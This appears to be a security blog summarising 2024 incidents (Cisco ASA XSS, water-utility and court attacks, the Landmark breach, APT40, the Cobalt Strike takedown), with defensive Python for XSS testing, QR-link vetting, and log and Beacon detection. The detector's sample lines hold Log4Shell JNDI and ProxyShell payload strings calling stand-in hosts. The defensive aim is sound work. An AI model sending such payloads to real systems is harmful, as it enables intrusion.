Tuesday, December 10, 2024

A Decade-Old Cisco ASA WebVPN Vulnerability

If your systems are still susceptible to a decade-old vulnerability, it is clear that your vulnerability management process, your patch management process, or both are not working.

This is not a hypothetical situation but a real-world occurrence. Actually, it is no surprise, as many organizations still lack a proper vulnerability management program. The worst part is that some of them are unaware of the risk they run by not having one.


https://bit.ly/3Vxf5vr


"Cisco on Monday (2 Dec 2024) updated an advisory to warn customers of active exploitation of a decade-old security flaw impacting its Adaptive Security Appliance (ASA).


The vulnerability, tracked as CVE-2014-2120 (CVSS score: 4.3), concerns a case of insufficient input validation in ASA's WebVPN login page that could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a targeted user of the appliance."


"The development comes shortly after cybersecurity firm CloudSEK revealed that the threat actors behind AndroxGh0st are leveraging an extensive list of security vulnerabilities in various internet-facing applications, including CVE-2014-2120, to propagate the malware."
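The bug class in the advisory above is reflected XSS: a login page echoes a request parameter into HTML without validating or encoding it. The Python below is an added example, not Cisco's code and not from the advisory; the handlers, the `/login` path and the `group` parameter are hypothetical stand-ins for the ASA WebVPN page, not its real parameter names. It shows the vulnerable rendering beside a hardened one, and a reflection check that injects a canary into each query parameter and reports any that come back unencoded, which is the same test you would run against an appliance after patching to confirm the fix took.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Hypothetical login-page handlers. The parameter name "group" is an
# assumption for the example, not the ASA WebVPN page's real parameter.
TEMPLATE = "<html><body><form><input name='group' value='{value}'></form></body></html>"


def vulnerable_login_page(params: dict) -> str:
    """Echoes the parameter straight into an HTML attribute: reflected XSS."""
    return TEMPLATE.format(value=params.get("group", ""))


def hardened_login_page(params: dict) -> str:
    """Validates against an allowlist, then output-encodes for the attribute context."""
    group = params.get("group", "")
    # Input validation: a group name is a short identifier; anything else is dropped.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", group):
        group = ""
    # Output encoding: quote=True also encodes ' and ", which matters inside value='...'.
    return TEMPLATE.format(value=html.escape(group, quote=True))


# Canary containing the characters that must be encoded in any HTML context.
CANARY = "cAnArY<'\">"


def find_reflections(url: str, fetch) -> list:
    """Inject the canary into each query parameter of `url` in turn and return
    the names of parameters whose value is reflected unencoded in the response.
    `fetch(url) -> body` is supplied by the caller (a real HTTP client in practice)."""
    parts = urlsplit(url)
    baseline = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    reflected = []
    for name in baseline:
        mutated = dict(baseline, **{name: CANARY})
        probe = urlunsplit(parts._replace(query=urlencode(mutated)))
        body = fetch(probe)
        if CANARY in body:  # raw reflection: exploitable
            reflected.append(name)
        # An HTML-encoded reflection (html.escape(CANARY) in body) is not reported: safe.
    return reflected


def make_fetch(handler):
    """Simulated transport for the example: routes the probe URL's query string
    to an in-process handler instead of making a network request."""
    def fetch(probe_url: str) -> str:
        query = parse_qs(urlsplit(probe_url).query, keep_blank_values=True)
        return handler({k: v[0] for k, v in query.items()})
    return fetch


if __name__ == "__main__":
    # Constructed target URL; the host and path are placeholders.
    target = "https://vpn.example.invalid/login?group=staff&lang=en"
    print("vulnerable:", find_reflections(target, make_fetch(vulnerable_login_page)))  # ['group']
    print("hardened:  ", find_reflections(target, make_fetch(hardened_login_page)))    # []
```

Against a real host you would pass a `fetch` built on an HTTP client and also probe POST form fields the same way; the canary deliberately mixes `<`, `'` and `"` so that a page which encodes only one of them is still reported.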

Sunday, December 1, 2024

Cyber Attacks on UK Drinking Water Supplies

Cybersecurity is paramount for all sectors, especially those that form our critical infrastructure. The consequences can be catastrophic if critical infrastructure is compromised by a cyberattack. Imagine the chaos that would ensue if you were without water for even three days.


A record number of cyber incidents impacted Britain’s critical drinking water supplies in 2024 without being publicly disclosed.


https://bit.ly/4fRV0s2


"Across all regulated critical national infrastructure sectors, more NIS incidents have been reported this year than ever before, with the transport and drinking water sectors the most impacted. In 2024, there were at least six incidents affecting drinking water infrastructure, according to data collected by Recorded Future News using the Freedom of Information (FOI) Act. In previous years there were no more than two."

Monday, November 18, 2024

Malware Via Snail Mail

Receiving malware through physical mail, delivered to your postbox on a piece of paper, might seem unusual. However, it has happened in Switzerland, and there's no reason to think it couldn't happen in your country as well.

Cybercriminals have sent physical letters containing QR codes that lead to malicious software. The letters falsely claim to offer a new weather app from MeteoSwiss (the official meteorological service of Switzerland), but the QR code actually leads to a malicious app created by the criminals. Attacks that use QR codes in this way are known as 'QR phishing' or 'quishing'.


https://bit.ly/4fzRQJs


"...These letters are fake and have been sent by fraudsters who are trying to load malware onto mobile phones.


The letter asks the recipients to install a new severe weather app. However, there is no such federal app with the name mentioned. Rather, the QR code shown in the letter leads to the download of malware called ‘Coper’ (also known as ‘Octo2’). When the supposed ‘Severe Weather Warning App’ is installed, the malware attempts to steal sensitive data such as access data from over 383 smartphone apps, including e-banking apps.


The malware only affects smartphones that run on the Android operating system..." 
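The practical defence against a letter like this is to treat the decoded QR payload as an untrusted URL and vet it before tapping. The Python below is an added example, not code from MeteoSwiss or the NCSC; the assumption that the official MeteoSwiss web presence lives under the Swiss federal `admin.ch` domain, the store hosts, and the sample URLs are all constructed for the example. It rejects direct APK downloads (the sideloading route the Coper/Octo2 letter relies on), lookalike hosts that merely contain the official name, punycode hosts, and non-HTTPS or non-web schemes, and flags app-store links for a manual developer-name check.

```python
from urllib.parse import urlsplit

# Assumptions for the example: the official MeteoSwiss web presence lives under the
# Swiss federal domain admin.ch; the hosts below are illustrative, not an authoritative list.
OFFICIAL_SUFFIX = ".admin.ch"
STORE_HOSTS = {"play.google.com", "apps.apple.com"}
BRAND_TOKENS = ("meteoswiss", "meteoschweiz", "admin.ch")


def vet_qr_url(payload: str) -> tuple:
    """Classify a decoded QR payload as ('accept'|'review'|'reject', reason)."""
    parts = urlsplit(payload.strip())
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        return ("reject", f"non-web scheme {scheme!r}")
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return ("reject", "no host in URL")
    # Punycode labels can render as homoglyphs of the real name; treat them as suspicious.
    if host.startswith("xn--") or ".xn--" in host:
        return ("reject", "internationalized (punycode) host")
    # A file download is the sideloading route; a government weather app is not shipped this way.
    if parts.path.lower().endswith(".apk"):
        return ("reject", "direct APK download")
    if host in STORE_HOSTS:
        return ("review", "app store link: confirm the listed developer is the federal office")
    if host == OFFICIAL_SUFFIX[1:] or host.endswith(OFFICIAL_SUFFIX):
        if scheme != "https":
            return ("reject", "official host but not HTTPS")
        return ("accept", "official federal domain")
    # The brand appears somewhere in the host, but the registered domain belongs to someone else.
    if any(token in host for token in BRAND_TOKENS):
        return ("reject", f"lookalike host {host!r}")
    return ("reject", f"unknown host {host!r}")


if __name__ == "__main__":
    # Constructed sample payloads, not URLs taken from the actual letters.
    for url in (
        "https://www.meteoswiss.admin.ch/",
        "https://meteoswiss.admin.ch.weather-alert.example/severe-weather",
        "https://cdn.weather-alert.example/SevereWeatherWarning.apk",
        "https://play.google.com/store/apps/details?id=example.weather",
        "intent://weather#Intent;scheme=https;end",
    ):
        print(vet_qr_url(url), url)
```

The suffix check uses `.endswith(".admin.ch")` rather than a substring test precisely because `meteoswiss.admin.ch.weather-alert.example` contains the official name while its registered domain is the attacker's.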

Wednesday, November 6, 2024

San Joaquin County Superior Court Cyber Attack


Another cyber incident involving JoIP (Justice over IP), the network-connected IT systems that courts now depend on.

But first, recall this:

https://bit.ly/40FHQK5


Cybercriminals can target any system connected to the internet, regardless of its importance or sensitivity. From personal devices to critical infrastructure, no system is immune, and that includes justice systems, which rely on IT infrastructure like everyone else.


Last week, a cyberattack disrupted operations at a California (USA) court, causing widespread technology outages.


A pressing concern arises for the public at this point: if cybercriminals can breach court systems, could they also manipulate critical legal documents?


The answer is not easy to give. While the exact extent of the potential damage is difficult to assess, it is clear that such attacks pose a serious threat to the integrity of the justice system.


https://bit.ly/3CavMGg


"The attack knocked out all of the court’s phone and fax services, websites containing juror reporting instructions, the e-filing platform, credit card payment processing and more. Some jurors scheduled for this week were excused."


"The attack comes just months after the Los Angeles County Superior Court system was hit with a ransomware attack that caused identical issues for weeks..."


"Government bodies across California continue to face an unprecedented wave of cyberattacks affecting city, county and state-level services. On Thursday (31.10.2024), the Housing Authority of the City of Los Angeles confirmed it is facing its second major cyberattack in the last two years."

Tuesday, October 29, 2024

Landmark Data Breach


You can take the necessary cybersecurity countermeasures for your own systems, but will that be enough?

Of course not. Many organizations overlook the security of their third-party service providers, and that oversight can lead to significant financial and reputational damage.


"Landmark, a Texas-based third-party insurance administrator, has disclosed a data breach that affects more than 800,000 individuals. The incident was detected in May; the compromised data include names, Social Security numbers, tax ID numbers, drivers’ license and state-issued identification card numbers, passport numbers, bank account and routing numbers, medical information, health insurance policy information, dates of birth, and/or life and annuity policy information..." (OMG! What else?)


See the links below for a summary of the breach:

https://bit.ly/3NQ28bP


https://bit.ly/3NJaEtj


"The Texas-based company works as a third-party administrator for insurance carriers like Liberty Bankers Insurance Group (LBIG), which includes American Monumental Life Insurance Company, Pellerin Life Insurance Company, American Benefit Life Insurance Company, Liberty Bankers Life Insurance Company, Continental Mutual Insurance Company, and Capitol Life Insurance Company."


"The breach notification letters note that the first incident occurred on May 13, when an IT team discovered “suspicious activity” that required them to disconnect the affected systems and hire a third-party cybersecurity firm. 

An investigation revealed that “there was unauthorized access to Landmark’s network and data was encrypted and exfiltrated from its system.” The hackers were in Landmark’s systems from May 13 to June 17." (The hackers were in the system for more than one month.)


"Landmark told regulators in Maine that 806,519 people were affected in total but they also filed documents in California and Texas, warning that about 68,000 Texans were impacted.


Insurance companies and their partners or subsidiaries are frequent targets for cyberattacks eager to steal volumes of sensitive health-related data. Last week, insurance firm Globe Life told the U.S. Securities and Exchange Commission that is being extorted by hackers after data on more than 5,000 people was stolen from a subsidiary."

Wednesday, October 9, 2024

American Water Works Cyber Attack

Cybersecurity for critical infrastructure is truly critical, and you need to understand that before you get hit by a cyber attack, before you are left without electricity or water. Take cyber threats seriously and put countermeasures in place before it is too late.


American Water Works, a major water utility, announced in a statement that it was recently targeted by a cyber attack. While the company reported that its water and wastewater facilities were not directly affected, the incident underscores the vulnerability of critical infrastructure to cyber threats. A successful cyber attack on a critical infrastructure provider could have severe consequences, including disruptions in essential services and potential public health risks. Investing in robust cybersecurity measures is essential to protect critical infrastructure and ensure the continued delivery of essential services.


https://bit.ly/4eNgl50


"The company’s MyWater account system is currently down, according to a notice on the company website, and all appointments set up by customers will be rescheduled. Additionally, all billing has been paused until further notice as they try to bring systems back online — there will be no late charges or service shut offs while systems are down."


"American Water Works provides drinking water, wastewater and other related services to an estimated 14 million people in 14 states as well as 18 military installations. From its regulated businesses, the company reported a net income of $971 million for 2023."


"American Water Works did not respond to requests for comment about whether they are dealing with a ransomware attack or if a ransom has been issued."


"The EPA (U.S. Environmental Protection Agency) said in May (2024) that in recent inspections, over 70% of water systems examined do not fully comply with the Safe Drinking Water Act and some 'have critical cybersecurity vulnerabilities, such as default passwords that have not been updated and single logins that can easily be compromised.'"

Tuesday, July 16, 2024

China's APT40 Gang is Ready to Attack Vulnerabilities Within Hours or Days

An advisory led by Australia, with participation from government agencies in the US, Canada, New Zealand, Japan, South Korea, the UK, and Germany, has revealed the tradecraft of the China-aligned threat actor APT40, also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk. This state-sponsored group, backed by the PRC Ministry of State Security, prioritizes developing and deploying exploits for newly disclosed vulnerabilities rapidly, sometimes within hours of a public proof of concept. The advisory details how APT40 conducts regular reconnaissance to identify unpatched or obsolete devices, allowing swift deployment of exploits.


APT40 targets vulnerabilities in widely deployed software such as Log4j and Microsoft Exchange, and often routes its attacks through compromised end-of-life small-office/home-office (SOHO) devices so that its traffic blends in with legitimate traffic. The group deploys web shells and hunts for valid user credentials to maintain persistent access, ultimately installing malware to exfiltrate information.


The advisory provides mitigations such as logging, patch management, network segmentation, multifactor authentication, disabling unused services, web application firewalls, least-privilege access, and replacing end-of-life equipment. It also includes links to ten malware samples used by APT40 and two case studies, though these may now be outdated. This information stems from the Australian Cyber Security Centre's 2022 investigation into an APT40 attack on a local organization.


https://bit.ly/4bKhM24


"The advisory is the result, and suggests that APT40 "possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability." The gang also watches networks of interest to look for unpatched targets."


"...Some of the vulns APT40 targets are old news – Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084), and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) are high on the hit list."


"The advisory outlines mitigation tactics that are said to offer decent defences against APT40. They're not rocket science: logging, patch management, and network segmentation are all listed.

So are multifactor authentication, disabling unused network services, use of web application firewalls, least privilege access, and replacement of end-of-life equipment."
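The advisory's first mitigation is logging, and the three product families named in the quote above have well-known request signatures. The Python below is an added example, not part of the advisory or the article: a small detector for Log4Shell JNDI lookups (including the `${lower:...}` / `${::-...}` nesting used to evade naive matching), the ProxyShell Autodiscover path confusion, and the Confluence OGNL injection, run over constructed Apache-combined-format log lines. The sample lines and source addresses are made up for the example, and the patterns cover the common public exploit shapes rather than every variant.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LOG = r'''
203.0.113.7 - - [16/Jul/2024:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
203.0.113.8 - - [16/Jul/2024:10:01:05 +0000] "GET /index HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.8/x}"
203.0.113.9 - - [16/Jul/2024:10:02:11 +0000] "GET /autodiscover/autodiscover.json?@evil.example/powershell HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.10 - - [16/Jul/2024:10:03:40 +0000] "POST /pages/createpage-entervariables.action?queryString=%5cu0027 HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.5 - - [16/Jul/2024:10:04:00 +0000] "GET /pages/viewpage.action?pageId=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Log4j lookup nesting used to evade naive "${jndi:" matching: ${lower:j}, ${upper:J}, ${::-j}
LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^}])\}|\$\{::-([^}])\}")

RULES = [
    # CVE-2021-44228: JNDI lookup string in any logged field
    ("log4shell", re.compile(r"\$\{jndi:[a-z]+:")),
    # CVE-2021-34473: Autodiscover path confusion reaching a backend endpoint via "@"
    ("proxyshell", re.compile(r"/autodiscover/autodiscover\.json[^ ]*@[^ ]*/(?:powershell|mapi/nspi|owa|ecp)")),
    # CVE-2021-26084: OGNL injection through queryString with an escaped quote (\u0027)
    ("confluence-ognl", re.compile(r"/pages/(?:createpage-entervariables|doenterpagevariables|createpage)\.action\?.*\\u0027")),
]


def normalize(text: str) -> str:
    """URL-decode, lowercase, and collapse single-character Log4j lookups until stable."""
    text = unquote(text).lower()
    previous = None
    while previous != text:
        previous = text
        text = LOOKUP_RE.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def detect(log_text: str) -> list:
    """Return (client_ip, rule_name) for every line matching a rule."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Payloads land in the path, the Referer or the User-Agent; check all three.
        fields = normalize(" ".join((m["path"], m["ref"], m["ua"])))
        for name, pattern in RULES:
            if pattern.search(fields):
                hits.append((m["ip"], name))
    return hits


if __name__ == "__main__":
    for ip, rule in detect(SAMPLE_LOG):
        print(f"{ip:<14} {rule}")
```

The normalization loop is the part worth keeping: exploit kits wrap each character of `jndi` in its own lookup, so a detector that only searches the raw line for `${jndi:` misses the second sample line entirely.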

Wednesday, July 10, 2024

Europol's Cobalt Strike Crackdown


International joint operations against the bad guys are strongly needed.

Europol announced that a week-long operation at the end of June took down nearly 600 IP addresses that were hosting illegal copies of Cobalt Strike.


Cobalt Strike is a commercial penetration testing tool for red team operations. It provides a command-and-control framework and the Beacon post-exploitation payload, and it supports attack vectors such as spear-phishing. Its purpose is to emulate advanced threats in order to test and improve cybersecurity defenses.


https://bit.ly/3XWM66f


"Europol said the disruptive action, dubbed Operation Morpheus, is the culmination of work that began three years ago. It was carried out with partners in the private sector between June 24 and 28."


"A total of 690 IP addresses were flagged to online service providers in 27 countries. By the end of the week, 593 of these addresses had been taken down."


"This investigation was led by the UK National Crime Agency and involved law enforcement authorities from Australia, Canada, Germany, the Netherlands, Poland, and the United States. Europol coordinated the international activity and liaised with the private partners."


"Cobalt Strike has long been the tool of choice for cybercriminals, including as a precursor to ransomware. It is also deployed by nation-state actors, such as Russian and Chinese [groups], to facilitate intrusions in cyber espionage campaigns."


"According to its telemetry, China hosts 43.85 percent of Cobalt Strike resources. To put that in context, the next biggest distributor is the US with a 19.08 percent share."


"Since Fortra bought Cobalt Strike in 2020, it has made strides in ensuring criminals don't get access to legitimate versions of its tools. For example, it soon started vetting all applicants vigorously before giving licenses out, but cracked versions in hard-to-reach places like China may prove difficult to eradicate for good."
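Since Beacon traffic is what defenders actually see on the wire, here is an added example (not Fortra's code and not from the Europol release) of three classic network-level tells of a team server left on default settings: stager URIs whose checksum8 is 92 (x86) or 93 (x64), callback paths from the public default Malleable C2 profile, and the bare 404 a team server returns to unexpected requests, which in older releases carried a trailing space on the status line. The proxy-log lines, hostnames and HTTP responses are constructed for the example; the URI list is a subset of the public default profile, and an operator with a custom profile changes all of it, so treat these as cheap hunting queries rather than proof.

```python
# Checksum8 values Beacon's stager shares with Metasploit's reverse_http stagers.
CHECKSUM8_X86 = 92
CHECKSUM8_X64 = 93

# Subset of callback URIs from the public default Malleable C2 profile (assumption:
# the server was left on defaults; a custom profile changes every one of these).
DEFAULT_BEACON_URIS = {
    "/activity", "/dpixel", "/__utm.gif", "/pixel.gif", "/g.pixel", "/dot.gif",
    "/updates.rss", "/fwlink", "/cm", "/cx", "/pixel", "/match", "/visit.js",
    "/load", "/push", "/ptj", "/j.ad", "/ga.js", "/en_US/all.js",
    "/IE9CompatViewList.xml", "/submit.php",
}

# Constructed proxy log: client, method, host, path, status (simplified format).
SAMPLE_PROXY_LOG = """\
10.0.0.5 GET cdn.example.invalid /aaa9 200
10.0.0.5 GET cdn.example.invalid /aab9 200
10.0.0.6 GET cdn.example.invalid /__utm.gif 200
10.0.0.6 POST cdn.example.invalid /submit.php?id=12345 200
10.0.0.7 GET www.example.invalid /index.html 200
10.0.0.7 GET www.example.invalid /login 200
"""


def checksum8(text: str) -> int:
    """Sum of the byte values modulo 256."""
    return sum(text.encode()) % 256


def classify_uri(path: str):
    """Return a label for a suspicious request path, or None."""
    bare = path.split("?", 1)[0]
    if bare in DEFAULT_BEACON_URIS:
        return "default-profile-uri"
    name = bare.lstrip("/")
    # Stager URIs are short random alphanumerics chosen so checksum8 hits the arch value.
    if 0 < len(name) <= 5 and name.isalnum():
        if checksum8(name) == CHECKSUM8_X86:
            return "stager-x86"
        if checksum8(name) == CHECKSUM8_X64:
            return "stager-x64"
    return None


def scan_proxy_log(log_text: str) -> list:
    """Return (client, path, label) for each suspicious line."""
    hits = []
    for line in log_text.strip().splitlines():
        client, _method, _host, path, _status = line.split()
        label = classify_uri(path)
        if label:
            hits.append((client, path, label))
    return hits


def looks_like_team_server_404(raw_response: bytes) -> bool:
    """Fingerprint the bare 404 a default team server returns to unknown paths:
    no Server header, Content-Type: text/plain, Content-Length: 0, and in older
    releases a trailing space after 'Not Found' on the status line."""
    head, _sep, body = raw_response.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0]
    headers = {}
    for h in lines[1:]:
        if b":" in h:
            k, v = h.split(b":", 1)
            headers[k.strip().lower()] = v.strip()
    if status == b"HTTP/1.1 404 Not Found ":
        return True
    return (status == b"HTTP/1.1 404 Not Found"
            and b"server" not in headers
            and headers.get(b"content-type") == b"text/plain"
            and headers.get(b"content-length") == b"0"
            and body == b"")


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

The checksum8 test is the one with real signal against cracked copies run by low-effort operators, since the stager URI is generated by the tool rather than chosen by the profile; a five-character alphanumeric path hitting 92 or 93 by chance is under one percent, so pair it with the host's reputation before escalating.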